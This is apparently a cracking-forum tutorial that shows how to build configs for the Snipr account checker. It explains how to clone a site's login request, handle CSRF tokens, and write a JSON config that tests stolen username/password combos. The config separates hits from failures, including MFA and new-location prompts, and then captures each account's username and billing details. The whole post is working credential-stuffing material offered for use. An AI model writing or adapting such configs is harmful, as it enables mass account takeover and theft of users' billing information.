Thuychung42004
Traffic Growth Hacker
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
Welcome to my 2nd Free Tutorial
Token: Token is basically a security made by website developers to stop bots like you from cracking accounts too easily. Not all websites have this but lets assume they do. Now, the above POST request
this is done by our browser automatically, now we want to send this exactly to google.com so it tells us if its correct or not. This is how we will do it in most cases.
Sometimes you wish to change the syntax of PostData meaning the Website wants Token first and after that password, how would you know this? As I said we are just going to clone the request and for that we will see what our browsers sends and clone it. Every browser have Developer tools/Inspect Element(Use Cntrl + SHIFT + I to open it). We are going to use that to see what happens when you put user and pass.
Now you've seen the postData send to the website, here it is how we are going to set it in Snipr.
SNIPR CONFIG TEMPLATE
as I said I can't cover everything, its 1.5 hour writting this tutorial now,, as there is alot to learn but I am hoping this will help you, I will make a new tut explaining further like headers, JSON requests etc.
Leave a like, share and subscribe
Code:
username=demonx&password=mystrongpass&token=123123sdasd123212n128312i
Code:
"username=demonx&password=mystrongpass&token=123123sdasd123212n128312i"
Code:
username=&password=&token=+token|1+
Code:
https://prnt.sc/je6wbw STEP 1
https://prnt.sc/je6xsv STEP 2
http://prntscr.com/je6yy0 STEP 3
Code:
ORIGINAL:
login_form%5Bname%5D=my_email%40gmail.com&login_form%5Bpassword%5D=mystrongpass&login_form%5Bredirect_url%5D=%2F&login_form%5B_token%5D=vlHZXQ-IO-yW1JB9mWrXuySeGmafKSAs3iGLw76J_eU
SNIPR:
login_form%5Bname%5D=&login_form%5Bpassword%5D=&login_form%5Bredirect_url%5D=%2F&login_form%5B_token%5D=+token|1+
Code:
{ \\ THIS IS GENERAL SECTION DEFINES NAME, PROXY ETC
"General": {
"name": "Config_name",
"proxyType": "Proxies/Proxyless",
"comboType": "Email/User",
"credit": "Win32.exe"
},
"Requests": [ \\ REQUESTS SECTIONS WHERE ALL GET AND POST HAPPENS
{
"actionUrl": "POST METHOD USUALLY USED TO POST USER + PASSWORD + ANY TOKEN TO WEBSITE FOR AUTHENTICATION", \\ request 1
"method": "POST",
"contentType": "application\/json; charset=UTF-8", \\ THIS EXAMPLE USES A JSON SITE, REMOVE IF NOT JSON
"postData": "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}", \\ whenever you want " as a string you put \"
"successKeys": [
"{\"token\":",
""
],
"failureKeys": [
"Password does not match",
"This account has been disabled.",
"\"mfa\": true",
"New login location detected",
],
"regex": [ \\this site needs a token to put in headers
{
"name": "token",
"pattern": "\"token\": \"([^\"]*)\"",
"usedFor": "headers"
}
]
}, \\ COMMA AFTER EVERY REQUEST HAS BEEN COMPLETED
{
"actionUrl": "This one is Get Method generally used to capture or get information after login or before login for token", \\request 2
"method": "GET",
"headers": [
{
"name": "Authorization",
"value": "+token|1+"
}
],
"regex": [
{
"name": "billing",
"pattern": "\"billing\": \"([^\"]*)\"",
"usedFor": "capture"
}
],
"successKeys": [
"\"billing\":"
]
},
{
"actionUrl": "SOMETIMES YOU NEED MULTIPLE REQUESTS THIS ONE IS USED TO CAPTURE USERNAME IN THE ACCOUNT",\\ request:3
"method": "GET",
"headers": [ \\ sometimes you need custom things in headers like a token, this is how you use it
{
"name": "Authorization",
"value": "+token|1+" \\ whenever you wish to use a regex/variable put it as +name|1+
}
],
"regex": [ \\another variable to store username
{
"name": "Cap",
"pattern": "\"username\": \"([^\"]*)\"",
"usedFor": "capture" \\ this one is used to capture
}
],
"successKeys": [
"\"username\":"
],
"capture": [
"Username - +Cap|1+ | Billing - +billing|1+" \\ this prints Username - "Our username Request 3" | BILLING - "Our Billing from Request 2"
]
}
]
}Leave a like, share and subscribe